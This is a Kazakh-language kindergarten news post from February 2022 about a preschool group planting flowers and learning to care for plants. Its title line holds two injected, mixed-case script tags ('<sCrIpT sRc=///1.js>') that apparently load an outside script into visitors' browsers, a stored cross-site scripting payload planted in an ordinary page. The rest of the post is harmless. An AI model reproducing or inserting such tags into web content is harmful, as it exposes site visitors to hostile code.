Бала күнінің көп бөлігін балабақшада өткізеді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.02.2022

Бала күнінің көп бөлігін балабақшада өткізеді.  Гүлдер мен өсімдіктер бөлмеге  жанды, жайлы атмосфераны құруға көмектеседі. Олар әдемі көрініп қана қоймайды, сонымен қатар пайдалы функцияларды орындайды - ауаны тазартады. Мектепалды даярлық "Зерек бала»  тобының балалары  өсімдіктерді күтуді, суаруды, топырақты қопсытуды, жапырақтарды жинауды жақсы көреді. Көктем жақындап қалды, демек,  гүлдер отырғызу уақыты келді. Балалар контейнерлерге  гүлдердің көшеттерін отырғызып, оларға қамқорлық жасайды. Ал көктемде алаңға көшет отырғызып, сүйіспеншілікпен гүлдерді өсіріп,суарып,жерді қопсытады және гүлдердің сұлулығына тамсанады.Балаларды гүлге күтім жасаудың қарапайым дағдыларына үйрету табиғатқа деген сүйіспеншілікті, қамқорлық пен адамгершілікті тәрбиелеуге бағытталған.

Тәрбиеші: Юркина Л.В.

Просмотров: 265


Пікір қосу



Деректерді қолтаңбаға қосу
Текст